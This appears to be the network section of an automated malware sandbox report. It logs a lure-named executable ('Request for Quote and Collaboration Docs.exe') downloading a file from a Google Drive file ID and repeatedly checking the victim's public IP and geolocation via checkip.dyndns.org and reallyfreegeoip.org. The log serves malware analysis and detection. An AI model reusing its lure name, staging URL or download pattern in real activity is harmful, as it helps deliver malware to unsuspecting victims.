                                                                                        Dec 3, 2024 15:23:58.209088087 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.211750031 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.211803913 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.212058067 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.212104082 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.214657068 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.214714050 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.214812994 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.214860916 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.217684031 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.217736006 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.217803955 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.217861891 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.218755007 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.218816042 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.220530033 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.220588923 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.221405983 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.221461058 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.225992918 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.226056099 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.226669073 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.226758003 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.227758884 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.227808952 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.228735924 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.228807926 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.229275942 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.229330063 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.230937004 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.230994940 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.232242107 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.232296944 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.233007908 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.233069897 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.242880106 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.242995024 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.243495941 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.243566036 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.243777037 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.243839979 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.245313883 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.245362997 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.245374918 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.245392084 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.245414019 CET44349932142.250.181.97192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.245417118 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.245435953 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.245455980 CET49932443192.168.2.9142.250.181.97
                                                                                        Dec 3, 2024 15:23:58.866247892 CET4994580192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:23:58.986123085 CET8049945132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.986234903 CET4994580192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:23:58.986520052 CET4994580192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:23:59.106451988 CET8049945132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:00.340361118 CET8049945132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:00.349138021 CET4994580192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:00.469778061 CET8049945132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:00.783490896 CET8049945132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:00.829293966 CET4994580192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:01.244560957 CET49953443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:01.244606972 CET44349953172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:01.244803905 CET49953443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:01.249906063 CET49953443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:01.249933958 CET44349953172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:02.598119974 CET44349953172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:02.598211050 CET49953443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:02.617695093 CET49953443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:02.617718935 CET44349953172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:02.618115902 CET44349953172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:02.638964891 CET49953443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:02.683335066 CET44349953172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:03.180744886 CET44349953172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:03.180876017 CET44349953172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:03.180965900 CET49953443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:03.238542080 CET49953443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:03.247704029 CET4994580192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:03.368016958 CET8049945132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:03.681214094 CET8049945132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:03.735614061 CET4994580192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:03.776756048 CET49959443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:03.776794910 CET44349959172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:03.776869059 CET49959443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:03.777223110 CET49959443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:03.777235985 CET44349959172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:05.086637974 CET44349959172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:05.093014956 CET49959443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:05.093044996 CET44349959172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:05.561448097 CET44349959172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:05.561513901 CET44349959172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:05.561558962 CET49959443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:05.561983109 CET49959443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:05.565642118 CET4994580192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:05.566512108 CET4996380192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:05.689097881 CET8049945132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:05.689114094 CET8049963132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:05.689160109 CET4994580192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:05.689202070 CET4996380192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:05.689460993 CET4996380192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:05.809340000 CET8049963132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:07.053200960 CET8049963132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:07.054585934 CET49968443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:07.054649115 CET44349968172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:07.054744959 CET49968443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:07.054995060 CET49968443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:07.055011988 CET44349968172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:07.095084906 CET4996380192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:08.316447973 CET44349968172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:08.318028927 CET49968443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:08.318068981 CET44349968172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:08.783703089 CET44349968172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:08.783778906 CET44349968172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:08.783824921 CET49968443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:08.784246922 CET49968443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:08.787530899 CET4996380192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:08.788722992 CET4997280192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:08.907911062 CET8049963132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:08.908018112 CET4996380192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:08.908643007 CET8049972132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:08.908736944 CET4997280192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:08.908869982 CET4997280192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:09.028873920 CET8049972132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:10.315865040 CET8049972132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:10.317126989 CET49975443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:10.317190886 CET44349975172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:10.317264080 CET49975443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:10.317519903 CET49975443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:10.317533970 CET44349975172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:10.364461899 CET4997280192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:11.628731012 CET44349975172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:11.630325079 CET49975443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:11.630367041 CET44349975172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:12.110932112 CET44349975172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:12.111004114 CET44349975172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:12.111062050 CET49975443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:12.111490965 CET49975443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:12.115602970 CET4998080192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:12.235788107 CET8049980132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:12.235878944 CET4998080192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:12.236035109 CET4998080192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:12.356838942 CET8049980132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:13.589466095 CET8049980132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:13.591202021 CET49984443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:13.591259003 CET44349984172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:13.591399908 CET49984443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:13.591690063 CET49984443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:13.591701984 CET44349984172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:13.641942024 CET4998080192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:14.854665995 CET44349984172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:14.907533884 CET49984443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:17.272075891 CET49984443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:17.272130013 CET44349984172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:17.704575062 CET44349984172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:17.704653978 CET44349984172.67.177.134192.168.2.9
                                                                                        Dec 3, 2024 15:24:17.704732895 CET49984443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:17.705291033 CET49984443192.168.2.9172.67.177.134
                                                                                        Dec 3, 2024 15:24:17.708132982 CET4998080192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:17.709033012 CET4998580192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:17.829269886 CET8049980132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:17.829407930 CET4998080192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:17.875226974 CET8049985132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:17.875415087 CET4998580192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:17.875540018 CET4998580192.168.2.9132.226.247.73
                                                                                        Dec 3, 2024 15:24:17.999532938 CET8049985132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:19.226557970 CET8049985132.226.247.73192.168.2.9
                                                                                        Dec 3, 2024 15:24:19.282468081 CET4998580192.168.2.9132.226.247.73
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 3, 2024 15:23:49.510726929 CET5898953192.168.2.91.1.1.1
                                                                                        Dec 3, 2024 15:23:49.648484945 CET53589891.1.1.1192.168.2.9
                                                                                        Dec 3, 2024 15:23:52.337472916 CET5163453192.168.2.91.1.1.1
                                                                                        Dec 3, 2024 15:23:52.477757931 CET53516341.1.1.1192.168.2.9
                                                                                        Dec 3, 2024 15:23:58.719922066 CET6053253192.168.2.91.1.1.1
                                                                                        Dec 3, 2024 15:23:58.857270956 CET53605321.1.1.1192.168.2.9
                                                                                        Dec 3, 2024 15:24:01.103481054 CET5580653192.168.2.91.1.1.1
                                                                                        Dec 3, 2024 15:24:01.243735075 CET53558061.1.1.1192.168.2.9
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 3, 2024 15:23:49.510726929 CET192.168.2.91.1.1.10xfa3dStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                        Dec 3, 2024 15:23:52.337472916 CET192.168.2.91.1.1.10x9383Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                        Dec 3, 2024 15:23:58.719922066 CET192.168.2.91.1.1.10x12b9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                        Dec 3, 2024 15:24:01.103481054 CET192.168.2.91.1.1.10x5a8aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 3, 2024 15:22:05.299932957 CET1.1.1.1192.168.2.90xd377No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 3, 2024 15:22:05.299932957 CET1.1.1.1192.168.2.90xd377No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                        Dec 3, 2024 15:23:49.648484945 CET1.1.1.1192.168.2.90xfa3dNo error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                                        Dec 3, 2024 15:23:52.477757931 CET1.1.1.1192.168.2.90x9383No error (0)drive.usercontent.google.com142.250.181.97A (IP address)IN (0x0001)false
                                                                                        Dec 3, 2024 15:23:58.857270956 CET1.1.1.1192.168.2.90x12b9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 3, 2024 15:23:58.857270956 CET1.1.1.1192.168.2.90x12b9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                        Dec 3, 2024 15:23:58.857270956 CET1.1.1.1192.168.2.90x12b9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                        Dec 3, 2024 15:23:58.857270956 CET1.1.1.1192.168.2.90x12b9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                        Dec 3, 2024 15:23:58.857270956 CET1.1.1.1192.168.2.90x12b9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                        Dec 3, 2024 15:23:58.857270956 CET1.1.1.1192.168.2.90x12b9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                        Dec 3, 2024 15:24:01.243735075 CET1.1.1.1192.168.2.90x5a8aNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                        Dec 3, 2024 15:24:01.243735075 CET1.1.1.1192.168.2.90x5a8aNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                        • drive.google.com
                                                                                        • drive.usercontent.google.com
                                                                                        • reallyfreegeoip.org
                                                                                        • checkip.dyndns.org
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.949945132.226.247.73802052C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 3, 2024 15:23:58.986520052 CET151OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Connection: Keep-Alive
                                                                                        Dec 3, 2024 15:24:00.340361118 CET321INHTTP/1.1 200 OK
                                                                                        Date: Tue, 03 Dec 2024 14:24:00 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        X-Request-ID: c028af938241bce2d2efe01c8d7c554b
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                        Dec 3, 2024 15:24:00.349138021 CET127OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Dec 3, 2024 15:24:00.783490896 CET321INHTTP/1.1 200 OK
                                                                                        Date: Tue, 03 Dec 2024 14:24:00 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        X-Request-ID: 74944bc191df289fc6aa446bf9ac426c
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
                                                                                        Dec 3, 2024 15:24:03.247704029 CET127OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Dec 3, 2024 15:24:03.681214094 CET321INHTTP/1.1 200 OK
                                                                                        Date: Tue, 03 Dec 2024 14:24:03 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        X-Request-ID: 8a2a8efc5de34f3cbfc77300bc57c112
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.949963132.226.247.73802052C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 3, 2024 15:24:05.689460993 CET127OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Dec 3, 2024 15:24:07.053200960 CET321INHTTP/1.1 200 OK
                                                                                        Date: Tue, 03 Dec 2024 14:24:06 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        X-Request-ID: 8de1936696790cc8b0f4a744d0469eb6
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.949972132.226.247.73802052C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 3, 2024 15:24:08.908869982 CET127OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Dec 3, 2024 15:24:10.315865040 CET321INHTTP/1.1 200 OK
                                                                                        Date: Tue, 03 Dec 2024 14:24:10 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        X-Request-ID: 637b2a19cc2291e429ba4749e31317fd
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.949980132.226.247.73802052C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 3, 2024 15:24:12.236035109 CET151OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Connection: Keep-Alive
                                                                                        Dec 3, 2024 15:24:13.589466095 CET321INHTTP/1.1 200 OK
                                                                                        Date: Tue, 03 Dec 2024 14:24:13 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        X-Request-ID: 668ea9612c38362580a3c4dd11dcaa5e
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        4192.168.2.949985132.226.247.7380
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 3, 2024 15:24:17.875540018 CET151OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                        Host: checkip.dyndns.org
                                                                                        Connection: Keep-Alive
                                                                                        Dec 3, 2024 15:24:19.226557970 CET321INHTTP/1.1 200 OK
                                                                                        Date: Tue, 03 Dec 2024 14:24:19 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 104
                                                                                        Connection: keep-alive
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        X-Request-ID: f241034148b693c1eff126a684db242a
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.949923172.217.19.1744432052C:\Users\user\Desktop\Request for Quote and Collaboration Docs.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-03 14:23:51 UTC216OUTGET /uc?export=download&id=1lgdW6QYobumFhnMWuJXQIs7wQ7eWkw80 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                        Host: drive.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-03 14:23:52 UTC1920INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 03 Dec 2024 14:23:51 GMT
